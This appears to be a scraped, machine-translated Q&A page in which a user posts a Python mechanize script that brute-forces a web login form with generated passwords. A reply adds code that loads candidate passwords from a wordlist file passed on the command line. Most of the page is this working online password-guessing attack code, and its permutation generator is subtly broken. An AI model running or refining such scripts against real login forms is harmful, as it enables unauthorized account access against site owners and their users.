Passwords 如何从单词列表加载密码以进行web表单登录?
我有一个Python脚本,它使用itertools强制执行web表单(登录) 如何用load-passwords-from-wordlist.txt功能替换bruteforce/字典生成过程 我的代码:Passwords 如何从单词列表加载密码以进行web表单登录?,passwords,python,dictionary,Passwords,Python,Dictionary,我有一个Python脚本,它使用itertools强制执行web表单(登录) 如何用load-passwords-from-wordlist.txt功能替换bruteforce/字典生成过程 我的代码: #!/usr/bin/python import mechanize import itertools br = mechanize.Browser() br.set_handle_equiv(True) br.set_handle_redirect(True) br.set_handle_r
#!/usr/bin/python
import mechanize
import itertools
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
combos = itertools.permutations("a-zA-Z",5)
r = br.open("http://example.com/login")
for x in combos:
br.select_form(nr = 0)
br.form['username'] = "my_username_123"
br.form['password'] = ''.join(x)
print "Checking ",br.form['password']
response = br.submit()
if response.geturl()!="http://example.com/login":
print "Correct password is ",''.join(x)
break
可以添加类似的内容,因此如果命令行参数中存在密码文件,它将使用该文件而不是预定义列表 示例:python script.py password.txt
大家好,欢迎来到信息安全!对我来说,这听起来更像是关于编程(如何使用Python读取文件)的问题,而不是关于安全性的问题。您可以在堆栈溢出时询问,但我怀疑他们希望您在询问之前进行自己的尝试。将“combos=itertools…”替换为“combos=open('wordlist.txt')”
import sys
import os
if len(sys.argv) > 1:
if os.path.exists(sys.argv[1]):
combos = [line.strip() for line in open(sys.argv[1])]
else:
print "[-] File not found"
sys.exit(0)
else:
combos = itertools.permutations("a-zA-Z",5)